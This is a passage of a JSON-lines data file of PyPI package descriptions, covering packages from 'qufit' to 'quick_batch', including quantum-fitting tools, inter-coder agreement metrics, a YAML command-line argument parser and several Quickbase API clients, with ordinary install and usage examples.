edheedhdhodhoo\u1300\u1301\u1301\u135e\u1302\u1302\u135e\u1303\u1304\u1304\u135e\u1305\u1306\u1306\u135ejajujuujijiijaajejeejjojoo\u1308\u1309\u1309\u135e\u130a\u130a\u135e\u130b\u130c\u130c\u135e\u130d\u130e\u130e\u135egaguguugigiigaagegeeggogoo\u1320\u1321\
u1321\u135e\u1322\u1322\u135e\u1323\u1324\u1324\u135e\u1325\u1326\u1326\u135exaxuxuuxixiixaaxexeexxoxoo\u1328\u1329\u1329\u135e\u132a\u132a\u135e\u132b\u132c\u132c\u135e\u132d\u132e\u132e\u135ecacucuuciciicaaceceeccocoo\u1330\u1331\u1331\u135e\u1332\u1332\u135e\u1333\u1334\u1334\u135e\u1335\u1336\u1336\u135ephaphuphuuphiphiiphaaphepheephphophoo\u1340\u1341\u1341\u135e\u1342\u1342\u135e\u1343\u1344\u1344\u135e\u1345\u1346\u1346\u135etsatsutsuutsitsiitsaatsetseetstsotsoo\u1348\u1349\u1349\u135e\u134a\u134a\u135e\u134b\u134c\u134c\u135e\u134d\u134e\u134e\u135efafufuufifiifaafefeeffofoo\u1350\u1351\u1351\u135e\u1352\u1352\u135e\u1353\u1354\u1354\u135e\u1355\u1356\u1356\u135epapupuupipiipaapepeeppopoo"} +{"package": "qufit", "pacakge-description": "\u672c\u6a21\u5757\u5305\u62ec\u4e86\u8d85\u5bfc\u91cf\u5b50\u8ba1\u7b97\u5b9e\u9a8c\u4e2d\u5e38\u7528\u6a21\u578b\u7684\u62df\u5408\u51fd\u6570\u4e0e\u6570\u636e\u5904\u7406\u65b9\u6cd5\u3002\ndataTools\u6a21\u5757\u4e3b\u8981\u5305\u542b\u4e86qubit\u80fd\u8c31\u4e0e\u7535\u538b\u7684\u8f6c\u6362\u51fd\u6570\uff0c\u4ee5\u53ca\u8bfb\u53d6IQ\u4fe1\u53f7\u7684\u4e34\u754c\u5224\u65ad\u65b9\u6cd5\noptimize\u6a21\u5757\u5305\u62ec\u4e86\u5404\u79cd\u5b9e\u9a8c\u8fc7\u7a0b\u7684\u62df\u5408\u51fd\u6570\uff0c\u4ee5\u53ca\u65f6\u9891\u5206\u6790\u65b9\u6cd5\uff0c\u5916\u52a0\u4e00\u90e8\u5206\u6570\u636e\u6e05\u6d17\u65b9\u6cd5\u3002"} +{"package": "quhep", "pacakge-description": "Construct Quantum Neural Network usingTensorflow-quantumorQiskit1. How to runCheckoutpip install quhepquhep_tfq -i data/qml/hmumu_twojet_0719.npy --nqubits 3 --batch-size 4 --training-size 4 --val-size 4 --test-size 4 --epochs 1 --loss mse use_quple"} +{"package": "qui", "pacakge-description": "Bindings for QML part of Qt"} +{"package": "quibble", "pacakge-description": "QuibbleUNDER CONSTRUCTION \ud83d\udea7MORE COMING SOON \ud83d\udd1cSTAY TUNED \ud83d\udcfbWhy Quibble? :thinking:Framework for various optimization tasks.InstallationSimply use the python package installer to getquibble:pipinstallquibblePackage is currently being integrated into PyPI, so please be patient if it is not yet working \ud83d\ude42ExamplesHere, you can find some minimal example to demonstrate the use ofquibble.Non-Linear ProgrammingimportnumpyasnpfromquibbleimportNonLinearProgrammingnlp=NonLinearProgramming(verbose=True)x_1=nlp.add_decision_variable('x_1',lower_bound=-10,upper_bound=10)x_2=nlp.add_decision_variable('x_2',lower_bound=-10,upper_bound=10)x_3=nlp.add_decision_variable('x_3',lower_bound=-1,upper_bound=1)nlp.add_constraint(x_1*x_2**3-np.sin(x_3-x_2/2),lower_bound=-2,upper_bound=2.5)nlp.add_constraint(abs(x_1+x_2+x_3),lower_bound=-2,upper_bound=1)nlp.add_objective(x_1+x_2+x_3)result=nlp.solve(trials=1)"} +{"package": "quibraries", "pacakge-description": "Quibraries is aPythonwrapper for thelibraries.ioAPI which is based onPybraries.\nCurrently the package fully supports the searching functionality, meaning that the full range of available commands\nfromlibraries.iois supported.The full documentation is hosted atRead the Docs.Differences with PybrariesThe main reason of existence of this package is thatPybrariesis notthread-safe.\nFurther, theAPIkey can be provided only as an environment variable, which makes it difficult to change\nduring execution. Additionally, is when a query returns multiple pages, inPybrariesthe iteration has to\nhappen manually and by the user. This is because the returned object is notIterable, thus convenient\n\u201cpythonic\u201d constructs cannot be used. 
The aforementioned reasons (and their associated pain points) sparked the creation of this project, which aims to offer what Pybraries does while also adding these (to us) important features. Key Terms: Below, a list of the key terms is provided; they are synonymous with the libraries.io concepts. host: a repository host platform, e.g. GitHub. owner: a repository owner, e.g. pandas-dev. repo: a repository, e.g. pandas. user: a repository user, e.g. a GitHub username such as discdiver. platform: a package manager platform, e.g. PyPI. project: a package or library distributed by a package manager platform, e.g. pandas. It is important to note that many repositories and projects share the same name. Additionally, many owners and repos also share the same name. Further, many owners are also users. Since this library is a wrapper around functionality that is already provided by libraries.io, the items returned depend on the API response. In normal circumstances, the answer type is defined by the number of returned items. If a single element is returned, it is a dictionary. If the result contains more than one item, the result is a list of dictionaries. Docs: Check out the full quibraries documentation. Getting Help: Check out the quibraries documentation. Check out the libraries.io docs. Open an issue on GitHub or tag a question on Stack Overflow with \u201cquibraries\u201d. Contributing: Contributions are welcome and appreciated! See Contributing. License: This software package is governed by the terms and conditions of the MIT license."} +{"package": "quic", "pacakge-description": "No description available on PyPI."} +{"package": "quica", "pacakge-description": "Quick Inter Coder Agreement in Python: Quica (Quick Inter Coder Agreement in Python) is a tool to run inter-coder agreement pipelines in an easy and effective way. Multiple measures are run and the results are collected in a single table that can be easily exported to LaTeX. quica supports binary or multiple coders. Free software: MIT license. Documentation: https://quica.readthedocs.io. Installation: pip install -U quica Get Quick Agreement: If you already have a pandas dataframe, you can run Quica with a few lines of code! Let's assume you have two coders; we will create a pandas dataframe just to show how to use the library. As for now, we support only integer values and we still have not included weighting. from quica.quica import Quica\nimport pandas as pd\n\ncoder_1 = [0, 1, 0, 1, 0, 1]\ncoder_3 = [0, 1, 0, 1, 0, 0]\ndataframe = pd.DataFrame({\"coder1\": coder_1, \"coder3\": coder_3})\nquica = Quica(dataframe=dataframe)\nprint(quica.get_results())\nThis is the expected output: Out[1]:\n              score\nnames\nkrippendorff  0.685714\nfleiss        0.666667\nscotts        0.657143\nraw           0.833333\nmace          0.426531\ncohen         0.666667\nIt was pretty easy to get all the scores, right? What if we do not have a pandas dataframe? What if we want to directly get the LaTeX table to put into the paper?
worry not, my friend: it\u2019s easier done than said!fromquica.measures.irrimport*fromquica.dataset.datasetimportIRRDatasetfromquica.quicaimportQuicacoder_1=[0,1,0,1,0,1]coder_3=[0,1,0,1,0,0]disagreeing_coders=[coder_1,coder_3]disagreeing_dataset=IRRDataset(disagreeing_coders)quica=Quica(disagreeing_dataset)print(quica.get_results())print(quica.get_latex())you should get this in output, note that the latex table requires the booktabs package:Out[1]:scorenameskrippendorff0.685714fleiss0.666667scotts0.657143raw0.833333mace0.426531cohen0.666667Out[2]:\\begin{tabular}{lr}\\toprule{}&score\\\\names&\\\\\n\\midrulekrippendorff&0.685714\\\\fleiss&0.666667\\\\scotts&0.657143\\\\raw&0.833333\\\\mace&0.426531\\\\cohen&0.666667\\\\\n\\bottomrule\\end{tabular}Featuresfromquica.measures.irrimport*fromquica.dataset.datasetimportIRRDatasetfromquica.quicaimportQuicacoder_1=[0,1,0,1,0,1]coder_2=[0,1,0,1,0,1]coder_3=[0,1,0,1,0,0]agreeing_coders=[coder_1,coder_2]agreeing_dataset=IRRDataset(agreeing_coders)disagreeing_coders=[coder_1,coder_3]disagreeing_dataset=IRRDataset(disagreeing_coders)kri=Krippendorff()cohen=CohensK()assertkri.compute_irr(agreeing_dataset)==1assertkri.compute_irr(agreeing_dataset)==1assertcohen.compute_irr(disagreeing_dataset)<1assertcohen.compute_irr(disagreeing_dataset)<1Supported AlgorithmsMACE(Multi-Annotator Competence Estimation)Hovy, D., Berg-Kirkpatrick, T., Vaswani, A., & Hovy, E. (2013, June). Learning whom to trust with MACE. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies (pp. 1120-1130).We define the inter coder agreeement as the average competence of the users.Krippendorff\u2019s AlphaCohens\u2019 KFleiss\u2019 KScotts\u2019 PIRaw Agreement: Standard AccuracyCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template. 
Thanks to Pietro Lesci and Dirk Hovy for their implementation of MACE. History: 0.1.0 (2020-11-08): New API to get the output; fixed test cases; extended documentation in the README file. 0.1.0 (2020-11-05): First release on PyPI."} +{"package": "quicc", "pacakge-description": "# quicc"} +{"package": "quicfire", "pacakge-description": "QUIC-Fire Python SDK"} +{"package": "quicfire-tools", "pacakge-description": "quicfire-tools Quick-Links: Documentation - PyPi Package What is quicfire-tools? quicfire-tools is a Python package that provides a convenient interface for programmatically creating and managing QUIC-Fire input file decks and processing QUIC-Fire output files into standard Python array data structures. The goals of quicfire-tools are to: make it easy to write Python code to work with QUIC-Fire input and output files; unify code, scripts, and workflows across the QUIC-Fire ecosystem into a single package to support the development of new QUIC-Fire tools and applications; and provide a platform for collaboration among QUIC-Fire developers and users. Installation: quicfire-tools can be installed using pip or conda. pip: pip install quicfire-tools conda: Conda support is coming soon! Issues: If you encounter any issues with the quicfire-tools package, please submit an issue on the quicfire-tools GitHub repository issues page."} +{"package": "quick", "pacakge-description": "No description available on PyPI."} +{"package": "quick2wire-api", "pacakge-description": "Quick2Wire API"} +{"package": "quick2wire-peque", "pacakge-description": "Quick2Wire API"} +{"package": "quickai", "pacakge-description": "QuickAI is a Python library that makes it extremely easy to experiment with state-of-the-art Machine Learning models. Announcement video: https://www.youtube.com/watch?v=kK46sJphjIs Demo: https://deepnote.com/project/QuickAI-1r_4zvlyQMa2USJrIvB-kA/%2Fnotebook.ipynb Motivation: When I started to get into more advanced Machine Learning, I started to see how these famous neural network architectures (such as EfficientNet) were doing amazing things. However, when I tried to implement these architectures on problems that I wanted to solve, I realized that it was not super easy to implement and quickly experiment with them. That is where QuickAI came in. It allows for quick and easy experimentation with many model architectures. Dependencies: Tensorflow, PyTorch, Sklearn, Matplotlib, Numpy, and Hugging Face Transformers. You should install TensorFlow and PyTorch following the instructions from their respective websites. Why you should use QuickAI: QuickAI can reduce what would take tens of lines of code into 1-2 lines. This makes fast experimentation very easy and clean. For example, if you wanted to train EfficientNet on your own dataset, you would have to manually write the data loading, preprocessing, model definition and training code, which would be many lines of code.
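For a sense of that boilerplate, the manual route in plain Keras looks roughly like the following sketch (purely illustrative, not taken from the QuickAI README; the dataset directory and class count are hypothetical): import tensorflow as tf\n\n# Manual pipeline: load the data, build the model, compile, and train.\ntrain_ds = tf.keras.utils.image_dataset_from_directory(\"my_dataset/\", image_size=(224, 224))\nbase = tf.keras.applications.EfficientNetB0(include_top=False, pooling=\"avg\")\nmodel = tf.keras.Sequential([base, tf.keras.layers.Dense(10, activation=\"softmax\")])\nmodel.compile(optimizer=\"adam\", loss=\"sparse_categorical_crossentropy\", metrics=[\"accuracy\"])\nmodel.fit(train_ds, epochs=5)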
Whereas, with QuickAI, all of these steps happen automatically with just 1-2 lines of code. The following models are currently supported: Image Classification: EfficientNet B0-B7, VGG16, VGG19, DenseNet121, DenseNet169, DenseNet201, Inception ResNet V2, Inception V3, MobileNet, MobileNet V2, MobileNet V3 Small & Large, ResNet 101, ResNet 101 V2, ResNet 152, ResNet 152 V2, ResNet 50, ResNet 50 V2, Xception. Natural Language Processing: GPT-NEO 125M (Generation, Inference), GPT-NEO 350M (Generation, Inference), GPT-NEO 1.3B (Generation, Inference), GPT-NEO 2.7B (Generation, Inference), Distill BERT Cased (Q&A, Inference and Fine Tuning), Distill BERT Uncased (Named Entity Recognition, Inference), Distil BART (Summarization, Inference), Distill BERT Uncased (Sentiment Analysis & Text/Token Classification, Inference and Fine Tuning). Object Detection: YOLOV4, YOLOV4 Tiny. Installation: pip install quickAI How to use: Please see the examples folder for details. For YOLOV4, you can download weights from here. Full documentation is in the wiki section of the repo. Issues/Questions: If you encounter any bugs, please open a new issue so they can be corrected. If you have general questions, please use the discussion section. Credits: Most of the code for the YOLO implementations was taken from \"The AI Guy's\" tensorflow-yolov4-tflite & YOLOv4-Cloud-Tutorial repos. Without this, the YOLO implementation would not be possible. Thank you!"} +{"package": "quickalias", "pacakge-description": "Quickalias: This Python script creates permanent aliases so you don't have to open your shell config file. Dependencies: python3. Currently Supported Shells: bash, zsh, fish, ksh, tcsh, oh, powershell (Linux). Installation: You have three ways to install this program. You can install with the PyPI package (with pip): pip install quickalias You can install with the PKGBUILD (for Arch users): git clone https://github.com/dCaples/quickalias\ncd quickalias\nmakepkg -si Or you can install with make: git clone https://github.com/dCaples/quickalias\ncd quickalias\nsudo make install Usage: CLI application. You may run quickalias in interactive mode (this example is using the zsh shell): $ quickalias\nEnter alias for command: hello\nEnter the command: echo hello\n\nAdded \"alias hello=\"echo hello\"\" to shell config\nYou can source the new changes with:\n source /home//.zshrc Using flags (this example is using the zsh shell): $ quickalias --alias \"hello\" --command \"echo hello\"\n\nAdded \"alias hello=\"echo hello\"\" to shell config\nYou can source the new changes with:\n source /home//.zshrc
command: str, shell: str) -> any- Take an alias and a command to be aliased and returns an alias command appropriate for the shell.will return a list to be passed to subprocess.run if the shell is fishwrite_alias(alias_command: str, config_file: str) -> str- Intended to write the output ofgenerate_alias_command()to the location provided byget_shell_config_file()ContributingCheck the issues (if there are any), it's a good place to start when you don't know what to do.Fork the repository and create pull requests to this repository.Don\u2019t change the formatting; Dont reformat or otherwise change the formatting of source code or documentation in the repo. Use the same formatting as the rest of the codebase.Make documentation; If adding features or otherwise changing the user experience create documentation regarding the added or changed features.Use space only indentation in all source code files with the sole execption ofMakefile. Do not use tabs or any form of indentation other than spaces. Use 4 space indentation."} +{"package": "quick-anomaly-detector", "pacakge-description": "AnomalyDetectionModelAnomalyDetectionModelsOverviewAnomalyDetectionModelis a python library that includs some simple implementation of an anomaly detection model.For more details, please refer to the document page:Documentpypi page link is here:(https://pypi.org/project/quick-anomaly-detector/)Quick StartInstallationYou can installAnomaly Detection Modelusing pip:pip install quick-anomaly-detectorQuick Start:from quick_anomaly_detector.models import AnomalyGaussianModel\n\n\n# Load your datasets (X_train, X_val, y_val)\nmodel = AnomalyGaussianModel()\n\n# Train the model\nmodel.train(X_train, X_val, y_val)\n\n# Predict anomalies in the validation dataset\nanomalies = model.predict(X_val)"} +{"package": "quickapi", "pacakge-description": "No description available on PyPI."} +{"package": "quickargs", "pacakge-description": "quickargsTakes a YAML config file and builds a parser for command line arguments\naround it. This allows you to easily override default settings by\npassing command line arguments to your program. 
Supports nested\narguments and auto-enforces parameter types.This config file\u2026input_dir:datalogging:file:output.loglevel:4\u2026 together with this main.py \u2026importyamlimportquickargswithopen(\"config.yaml\")asf:config=yaml.load(f,Loader=quickargs.YAMLArgsLoader)\u2026 will give you this command line interfaceusage: main.py [-h] [--input_dir INPUT_DIR] [--logging.file LOGGING.FILE]\n [--logging.level LOGGING.LEVEL]\n\noptional arguments:\n -h, --help show this help message and exit\n --input_dir INPUT_DIR\n default: data\n --logging.file LOGGING.FILE\n default: output.log\n --logging.level LOGGING.LEVEL\n default: 4Override settings using the command linepython main.py--logging.file=other_log.txtYou get your merged yaml + command line parameters in a convenient dictionary# exact same output format as normal yaml.load would produce\n{'input_dir': 'data', 'logging': {'file': 'other_log.txt', 'level': 4}}The types used in the yaml file are automatically enforcedSetting the log-level to a string instead of an int:python main.py--logging.level=WARNINGusage: main.py [-h] [--input_dir INPUT_DIR] [--logging.file LOGGING.FILE]\n [--logging.level LOGGING.LEVEL]\nmain.py: error: argument --logging.level: invalid int value: 'WARNING'Setting the log-level to the correct type:python main.py--logging.level=0{'input_dir': 'data', 'logging': {'file': 'output.log', 'level': 0}}Installationpip install quickargsUsageLoad the yaml config and parse command line argumentsmain.pyimportyamlimportquickargswithopen(\"config.yaml\")asf:config=yaml.load(f,Loader=quickargs.YAMLArgsLoader)Deeply nested arguments are no problemconfig.yamlkey1:key2:key3:key4:valueOverride nested argument using dot notation:python main.py--key1.key2.key3.key4=other_value{'key1': {'key2': {'key3': {'key4': 'other_value'}}}}Of course it is fine to just call your program without any command line argumentsHappy with the default values in config file:python main.py{'key1': {'key2': {'key3': {'key4': 'value'}}}}Most yaml types, including sequences are supportedconfig.yamlthresholds:[0.2,0.4,0.6,0.8,1.0]Override the thresholds:python main.py--thresholds='[0.0,0.5, 1.0]'(take care to use \u2018 \u2018 around your command line arguments if they include\nspaces){'thresholds': [0.0, 0.5, 1.0]}However, types within sequences are not enforcedconfig.yamlthresholds:[0.2,0.4,0.6,0.8,1.0]List of strings instead of list of floats does not give an error:python main.py--thresholds=[a,b,c]{'thresholds': ['a', 'b', 'c']}You can even pass references to functions or classes (your own or builtins)config.yamlfunction_to_call:!!python/name:yaml.dumpOverride with reference to built-in zip function:python main.py--function_to_call=zip{'function_to_call': }Example with all supported typesconfig.yamlan_int:3a_float:3.0a_bool:Truea_complex_number:37-880ja_date:2016-12-11sequences:a_list:[a,b,c]# for tuples you need to use square [] brackeds in the yaml and on the command line# they will still be proper tuples in the resulta_tuple:!!python/tuple[a,b]python:a_function:!!python/name:yaml.loada_class:!!python/name:yaml.loader.Loadera_module:!!python/module:contextlib# can be overwritten with any typea_none:!!python/noneOverride every single parameter in the config filepython main.py --an_int=4 --a_float=2.0 --a_bool=False --a_complex_number=42-111j --a_date=2017-01-01 \\\n --sequences.a_list=[c,b,c] --sequences.a_tuple=[b,a] --python.a_function=zip \\\n --python.a_class=yaml.parser.Parser --python.a_module=yaml --python.a_none=1234{'a_bool': False,\n 
'a_complex_number': '42-111j',\n 'a_date': datetime.date(2017, 1, 1),\n 'a_float': 2.0,\n 'an_int': 4,\n 'python': {'a_class': ,\n 'a_function': ,\n 'a_module': ,\n 'a_none': None},\n 'sequences': {'a_list': ['c', 'b', 'c'], 'a_tuple': ('b', 'a')}}Currently not supportedTypesFollowing types are not supported at all:!!python/dict (because it looks just like the rest of the yaml file)!!pairsFollowing types are not enforced / objects will not be instantiated:!!python/object!!python/object/new!!python/object/applyMulti-document loadingIf the YAML file contains multiple documents, only the first document\nwill be considered. Theyaml.load_allfunctionality is not\nsupported."} +{"package": "quick-arguments", "pacakge-description": "Check out the README onGitLab!"} +{"package": "quickassert", "pacakge-description": "quickassertA Python runtime service:\nAssertion admin with generated exceptionShort Description from v.1.0 (first)Creates assertion administor (access) on relatively small prodjects, in order to save time used in raising and writing exceptions.\nIt generate automatically a one-pattern exception.Quick UseFirst, run the command:pip install quickassertWhen the installation is done, an example is:from quickassert import *\n\nentry_assert = new_assert(_global=False) # necessary to call once if AUTO_NEW_ASSERT is False\n\n# declare assertion test named digit\nentry_assert['digit'] = lambda x: 0 <= x < 10\n\n\ndef enter_digit(d: int) -> None:\n if isinstance(d, int):\n entry_assert.digit('d', d)\n print('O.K.')\n return\n raise TypeError('d must be int')where one can obtain:>>> enter_digit(4)\n>>> O.K.\n\n>>> enter_digit(23)\n>>> ValueError: d must be digitComing in following versionsBetter exception and message handling.Mode with inspection, no need to pass variable name if same (maybe with a decorator)Smallest tree checking, for optimisation, for example:\n(x > 3) & (x > 5) ~ (x > 5)Typing check adapted.And maybe more"} +{"package": "quickauth", "pacakge-description": "A quick user-password authentication for Python.InstallationpipinstallquickauthUsagefromquickauth.coreimportQuickAuthauthenticator=QuickAuth()print(authenticator.register())print(authenticator.authorize(key='fbdca934-34c0-11e9-8bb3-685b35d08286',value='579d0f25-aed1-40c4-afa8-61e11254f47e'))print(authenticator.update(key='fbdca934-34c0-11e9-8bb3-685b35d08286'))Outputs:{'key':'fbdca934-34c0-11e9-8bb3-685b35d08286','secret':'579d0f25-aed1-40c4-afa8-61e11254f47e'}True{'key':'fbdca934-34c0-11e9-8bb3-685b35d08286','secret':'974bc9bb-8839-4f0c-83b7-adc78cc3247d'}Run from terminal:python3-mquickauth.core[-h][--dbDB][-kKEY][-sSECRET]OPERATIONPositional arguments:OPERATIONregister, authorize, or updateOptional arguments:-h,--helpshow this help message and exit--dbDBdatabase file, default: auth.db-kKEY,--keyKEYkey-sSECRET,--secretSECRETsecret"} +{"package": "quickavro", "pacakge-description": "quickavroquickavro is a Python library for working with theAvrofile format. The purpose of this library is to provide a high-performance interface in Python for reading/writing Avro files. The performance of Avro has been historically very poor in Python, so quickavro makes use of a Python C extension that directly interacts with the official Avro C API. 
quickavro is currently alpha quality.DocumentationAPI documentation and examples can be found athttp://chrisrx.github.io/quickavro.Install$pipinstallquickavroIt is important to note, however, that untilPyPi allows binary wheels for linux,setup.pywill attempt to download and compile the dependencies when installing withpip install.Building from sourcequickavro depends upon several C libraries:Avro CJanssonSnappyThey depend upon traditional build/config tools (cmake, autoconf, pkgconfig, etc), that sometimes make compiling this a nightmare so I ended up trying something a little different here and so far it is working well.makevendormakemakeinstallThevendormake target downloads and unpacks the source files for all the libraries, while the default make targetbuild, calls Python setuptools/distutils to staticly compile these and creates aWheelbinary package. This removes the need for these libraries to be dynamically linked correctly and can trivially be packaged within the binary Wheel package without worries like if the header package has installed for the library."} +{"package": "quickbackend", "pacakge-description": "No description available on PyPI."} +{"package": "quickban", "pacakge-description": "No description available on PyPI."} +{"package": "quickbar", "pacakge-description": "A small rich TQDM cloneThe goal of this small package is to turn therich packageinto a clone oftqdm.For now, only basics are here:fromquickbarimportQuickbarforiteminQuickbar.track(iterator):# do fancy stuffprint(\"I exist !\")This is the big upside of TQDM over rich: a less cool bar, but one line is enough !"} +{"package": "quickbase2", "pacakge-description": "UNKNOWN"} +{"package": "quickbase-client", "pacakge-description": "A High-Level Quickbase Python API Client & Model GeneratorQuickbase-Client is a library for interacting with Quickbase applications through their\nRESTful JSON API (https://developer.quickbase.com/). It has features to generate model classes\nfor tables in your Quickbase app, and provides high level classes to interface between Python\nobjects and the Quickbase tables.Quick StartInstallationInstallation can be done through pip:pipinstallquickbase-clientThis will install both the libraryquickbase_client, and a command line toolqbcfor\nrunning some handy scripts.Generating your ModelsTo interact and authenticate with your Quickbase applications you need a User Token. 
You can read\nthe Quickbase documentationhereon how to create one.\nIt is recommended to set an environment variableQB_USER_TOKENwith this value:exportQB_USER_TOKEN=mytokenfromquickbase;Next, say you have a hypothetical Quickbase Application named MyApp athttps://foo.quickbase.com/db/abcdefthat has tables for tracking things\nagainst a repository like Issues & Pipelines.Running the following:qbcrunmodel-generate-ahttps://foo.quickbase.com/db/abcdefWould generate a directory structure likemodels\n\u251c\u2500\u2500 __init__.py\n\u2514\u2500\u2500 my_app\n \u251c\u2500\u2500 __init__.py\n \u00a0\u00a0 \u251c\u2500\u2500 app.py\n\u00a0\u00a0 \u251c\u2500\u2500 github_issue.py\n\u00a0\u00a0 \u2514\u2500\u2500 gitlab_pipeline.pyAnd classes likeGitHubIssuewhere you can interact with the data model through a Python object.Writing Records to QuickbaseClasses likeGitHubIssuethat subclassQuickbaseTablealso get a factory class-methodclient(user_tok)which creates an instance of the higher-levelQuickbaseTableClientto\nmake API requests for things related to that table:client=GitHubIssue.client(user_tok=os.environ['QB_USER_TOKEN'])new_issue=GitHubIssue(title='Something broke',# you get friendly-kwargs for fields without worrying about ID'sdescription='Please fix!',date_opened=date.today()# things like Python date objects will be serialized)response=client.add_record(new_issue)print(response.json())# all methods (except for query) return the requests Response objectQuerying Records from QuickbaseYou can also use the client object to send queries to the Quickbase API through thequerymethod. This method will serialize the data back in to a Python object. Thequerymethod on the\ntable class takes aQuickbaseQueryobject which is high level wrapper around the parameters\nneeded to make a query.Notably, thewhereparameter for specifying the query string. There is one (and in the future\nthere will be more) implementation of this which allows you to build query-strings through\nhigher-level python functions.You can use the methods exposed in thequickbase_client.querymodule like so:# convention to append an underscore to these methods to avoid clashing# with any python keywordsfromquickbase_client.queryimporton_or_before_fromquickbase_client.queryimporteq_fromquickbase_client.queryimportand_schema=GitHubIssue.schemaq=and_(eq_(schema.date_opened,schema.date_created),on_or_before_(schema.date_closed,date(2020,11,16)))print(q.where)# ({'9'.EX.'_FID_1'}AND{'10'.OBF.'11-16-2020'})recs=client.query(q)# recs will be GitHubIssue objects unless passing raw=Trueprint([str(r)forrinrecs])# ['']Controlling Lower-Level API CallsLastly, say you want to deal with just posting the specific json/data Quickbase is looking for.\nTheQuickbaseTableClientobject wraps the lower-levelQuickbaseApiClientobject which has\nmethods for just sending the actual data (with an even lower-level utilityQuickbaseRequestFactoryyou could also use). These classes manage hanging on to the user token,\nand the realm hostname, etc. 
for each request that is made.For example, note the signature ofqueryinQuickbaseApiClient:defquery(self,table_id,fields_to_select=None,where_str=None,sort_by=None,group_by=None,options=None):You can get to this class by going through the table client:api = client.api, or from\ninstantiating it directlyapi = QuickbaseApiClient(my_user_token, my_realm)With this, we could make the exact same request as before:api=QuickbaseApiClient(user_token='my_token',realm_hostname='foo.quickbase.com')response=api.query(table_id='abcdef',where_str=\"({'9'.EX.'_FID_1'}AND{'10'.OBF.'11-16-2020'})\")data=response.json()More Resourcesexamplesdirectory.CONTRIBUTINGLICENSEOther NotesCurrently a bunch of duplicate aliases forQuickBasetoQuickbasesince this\nwas originally released with everything prefixed asQuickBase-. But since Quickbase\nis branding more to \u201cQuickbase\u201d, this will eventually be the main naming for\nversion 1.0 in an effort to keep more consistent. So prefer to useQuickbase-prefixed classes\nas in the future the other aliases will be dropped."} +{"package": "quickbase-json-api-client", "pacakge-description": "quickbase-json-api-clientUnofficial QuickBase JSON API wrapper for Python.Created by Synctivate Developers!Custom software solutionsfrom Fredericksburg, Virginia!Documentationhttps://github.com/robswc/quickbase-json-api-client/wikiQuickstartInstallationTo install, run:pipinstallquickbase-json-api-clientInitialize ClientUse the following code to create and initialize a client object.fromquickbase_jsonimportQBClientclient=QBClient(realm=\"yourRealm\",auth=\"userToken\")WhereyourRealmis the name (subdomain) of your Quickbase Realm anduserTokenis the user token used to authenticate\nwith the realm. You can also include an optionalagent: strargument, which will change the User-Agent (used in headers) from the default \"QJAC\" to whatever string is passed. This isheavily recommended, as it makes figuring out the origin of API calls easier.Query RecordsQuerying for records is one of the most useful features of the Quickbase JSON API. Querying records with QJAC can be done\nusing the following codeBasic Exampleresponse=client.query_records(table='tableId',select=[3,6,12],where='queryString')data=response.data()WheretableIdis the ID of the table you wish to query from,fidsis a list of field IDs you wish to receive andqueryStringis a quickbasequery string.Adv. Examplefromquickbase_json.helpersimportWhere# have static fids for table/recordsNEEDED_FIDS=[3,6,12]# build query str where 3 is either 130, 131 or 132# https://help.quickbase.com/api-guide/componentsquery.htmlq_str=Where(3,'EX',[130,131,132]).build(join='OR')response=client.query_records(table='tableId',select=NEEDED_FIDS,where=q_str)In this example, we use theWhere()helper. This can make building complexQuickBase querieseasier.TheWhere()helper documentation can be foundhere.Response ObjectsAQBResponseobject is returned when querying records with QJAC. AQBResponsehas several methods that make\nhandling returned data easier. Here are a few of the most useful ones.Response Methods.data()r=qbc.query_records(...).data()Returns the data from QuickBase. Equivalent to calling.get('data').denest()r=qbc.query_records(...).denest()Denests the data. I.e. changes{'fid': {'value': 'actualValue'}}to{'fid': 'actualValue'}orient(orient: str, key: int)r=qbc.query_records(...).orient('records',key=3)Orients the data. Currently, the only option is 'records'. This will orient the returned data into a \"record like structure\", i.e. 
changes{'fid': 'actualValue', 'fid': 'actualValue'}to{'key': {etc: etc}}convert()r=qbc.query_records(...).convert('datetime')Converts the data, based on fields and provided arguments. For example, callingconvert('datetime')will convert all data with fields\nof the 'date time' type to python datetime objects. Other conversions are 'currency' and 'int'.round_ints()r=qbc.query_records(...).round_ints()Rounds all float integers into whole number ints. i.e. converts55.0to55.Additional FeaturesInformation on additional features that go beyond the scope of an introduction README.md, can be found on theGitHub Wiki!This include things like...Easy file uploading/downloadingInserting, Updating and Deleting recordsCreating tablesAuthenticating w/Quickbaseetc.Issues/BugsIf you come across any issues or want to file a bug report, please do sohere.Thanks!"} +{"package": "quickbase-model-maker", "pacakge-description": "quickbase-model-makerA lightweight tool for creating and managing QuickBase models!Turn this\ud83d\udc4e# select relevant infoselect=[3,43,23,63,21,52,24,54]Into this\ud83d\udc4dfromreferences.order_managerimportOrderselect=[Order.RECORD_ID,Order.ORDER_TYPE,Order.ORDER_NUMBER,Order.DELIVERY_DATE...]With just a few lines of code!Installationpipinstallquickbase-model-makerUsageInitializingThe sample code below will initialize your models for use in your application. Models are created within their respective app folders, in a new directory calledreferences.# import model makerfromquickbase_model_makerimportModelMaker# create model maker with realm and auth infoqmm=ModelMaker(realm='realm',auth='AUTH-TOKEN')# register tables you wish to create models fromqmm.register_tables([('bqs5asdf','bqs5aser'),# ('app_id', 'table_id') tuples('bqs5abzc','brzaners'),('bqs5abzc','brzanvac'),('bqs5abzc','bqs5wers'),])Generate your models, based off of the registered tables, with the.sync()method.# call sync method to create modelsqmm.sync(only_new_tables=True)Optionally, you can sync all registered tables, regardless of whether they have already been synced.\nIt is recommended to call.sync()only when you wish to re-generate models, aseach model sync with Quickbase costs 1 API call. You only have to generate\nmodels once - or when you wish to update your models (i.e. new field you need to access added on quickbase). Calling.sync()on\nevery script runcould result in a large number of API calls.qmm.sync()In codeOnce registered and created, models can be used in your application.The following code uses a fictional \"Order\" model to demonstrate\nhow one can access theORDER_TYPEfield. One can also access useful metadata\nthrough methods like.table_id()and.app_id().fromreferences.ordersimportOrderprint(Order.ORDER_TYPE)print(Order.table_id())Removing ModelsModels can easily be removed by doing the following:Remove the model from thereferences/appdirectoryRemove the related table from thereferences/__init__.pyfile.Remove the related table tuple from the.register_tables()method."} +{"package": "quickbase-quickbooks", "pacakge-description": "No description available on PyPI."} +{"package": "quick-batch", "pacakge-description": "quick_batchquick_batchis an ultra-simple command-line tool for large batch python-driven processing and transformation. It was designed to be fast to deploy, transparent, and portable. 
